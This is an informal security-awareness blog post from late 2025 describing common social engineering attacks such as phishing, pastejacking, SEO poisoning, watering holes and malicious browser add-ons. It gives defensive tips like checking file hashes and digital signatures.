"What social engineering attacks are in 2025"




Introduction

Social engineering covers a lot of ground, so I’d suggest checking out the stealer log report for a deeper dive into file-based attacks. In the cases reviewed here, most attacks depended on deceiving users into revealing credentials or enabling access rather than exploiting technical vulnerabilities alone.

1. Phishing

Phishing is a fileless attack where the attacker creates fake pages that look like well-known sites to steal sensitive information, such as usernames, passwords, or bank/PayPal account details. The common delivery methods for these fake webapp are SMS, Email, QR code, fake ads on search engines, social media DMs, Messaging apps.

There are 4 main types of web app phishing:

Spear Phishing:Targeted attacks on specific individuals or organizations, often using personalized info from OSINT, social media, or leaks to build trust. These attacks have a higher chance of success. due to highly personalized messages that build trust and increase the chance of success.

bulk phishing: Bulk phishing is when attackers send out fake websites or messages to large groups of users without any specific targeting. These attacks typically have a much higher failure rate, often due to obvious mistakes for example, sending a “PayPal urgent action” email to someone who doesn’t even use PayPal, or failing to include the recipient’s name in the message and using general “Dear user”.

Voice/phone call A rising variant of vishing uses AI to clone or mimic a trusted person’s voice on live phone calls. Attackers leverage these deepfake voices to build immediate credibility and order the victims into actions like approving transfers, disclosing OTPs, or handing over account details. Because the voice sounds familiar or authoritative, victims are more likely to comply.

Compromised Account Phishing (Double Phishing) In this type of attack, the attacker first compromises a trusted user or organization’s account, then uses it to target that account’s followers or clients. For example, a recent report of BNB Chain’s official X account was phished, and attackers posted 10 malicious links that tricked followers into connecting wallets or approving transactions. This method exploits both the authority of the original account and the trust of its audience, increasing the likelihood of success

2. Self XSS / Pastejacking Attacks

Is a social engineering attack where malicious websites silently replace clipboard content with harmful commands (PowerShell scripts, wallet-draining code) when a user copies text. Victims are then instructed to paste and execute the content in a terminal, browser console. unwittingly installing malware or transferring funds.

PowerShell commands- PowerShell is a built-in automation tool, and new reports indicate that attackers are using social engineering on visitors of malicious or compromised websites to trick them into copying and pasting code into their command line, that downloads and executes malware on their systems. Another tactic involves using a JavaScript copy button that replaces visible text, so what appears as “this is safe command" becomes something entirely different when pasted, such as “this is harmful command.”

Self XSS in 2025: browser console attacks, triggered when users press F12 and paste malicious code into the browser console. represent a highly effective social engineering vector. Attackers, often posing as technical support or site administrators, convince victims to execute JavaScript directly in the context of a legitimate webpage.

This grants full access to the page’s DOM, form inputs, localStorage, session tokens (if not secured), and connected APIs, enabling immediate theft of credentials, session hijacking, or unauthorized actions. These attacks frequently bypass traditional phishing detection by exploiting user trust in real websites and urgent prompts like “fix login error” or “verify wallet connection.” The only reliable defense is a strict policy: never paste any code into the browser console, regardless of the source or stated purpose.

3. SEO poisoning

SEO poisoning is a cyberattack where criminals use black-hat SEO or paid ads to push malicious websites into the top 10 search results. Attackers create fake websites that closely mimic legitimate software sites (like notepad-plus-plus-download.com instead of the official notepad-plus-plus.org), using similar domain names, logos, and layouts.

By ranking these counterfeit sites above the authentic ones, they trick users searching for trusted software (e.g., Notepad++, PuTTY, DeepSeek) into downloading malware disguised as the official installer. Recent 2025 campaigns have targeted over 8,500 systems, with attackers now impersonating AI tools and using advanced techniques like compromising legitimate servers to inherit their search rankings.

In another cases malicious PDF/document files can be hosted on malicious sites to trick users looking for documents into downloading them and infecting their systems.

To prevent infection from SEO poisoning:

4. Watering hole attacks

in watering hole attack we are talking about an official website getting compromised by attackers and its official installation file is replaced with a backdoored one that will infect the users.

To defend yourself, you can visit the official GitHub repository of the program you want to download. these repositories are harder for attackers to compromise compared to regular websites. They also have a 256 Hash value.the safest is to just downloading directly from GitHub If you choose to download from the official website you have the GituHub 256 Hash to verify the file, you can do it with this PowerShell command:

Get-FileHash 'C:\Path\to\your\file.exe' -Algorithm SHA256

The result is a long string such as: 745FD1720A71A62F47B2259AD8DC5393DEF2C881A668967C7A54FF0C5DB2C67F Compare the 256 Hash from your PowerShell console to the GitHub one. If it’s a match the files on the official website hasn’t been tampered with. As a bonus for your security, you can check and see if you downloaded file was tempered by MITM attacks from ISPs, network operators, and transit corruption.

In cases where there is no GitHub repo for the application, you can check the file signature by right click -> properties-> digital signatures tab -> click on ‘name of signer’ -> details -> advanced tab -> click on issuer. If something doesn’t look legit on the signature issuer you should be cautious.

Also after clicking the ‘details’ you can see a document logo with information message such as:

“This digital signature is OK” and as a warning “One of the countersignatures is not valid. The file may have been altered.

Notice that some software doesn’t have any signature at all because of its price tag, again common sense will save you from being infected.

5. Browser permissions

Never allow Notifications, Camera, Microphone, Clipboard Read/Write, Geo location or WebUSB on any site you don’t 100 % trust. Be very cautious of WebUSB, as it can give access to any plugged in USB device and could be critical cause issues.

6. Browser addons

In August 2025, Mozilla Firefox removed 150+ crypto-draining add-ons impersonating wallets like MetaMask and TronLink, which stole seed phrases and IP addresses after benign uploads turned malicious via updates.

in July 2025, 18 extensions (affecting 2.3 million users) were pulled by Google for tracking browsing behavior and credential theft via updates.

Verdict

The machine doesn’t betray you, your moment of “sure, why not” does...




Signed, 12 Dec 25
Nathan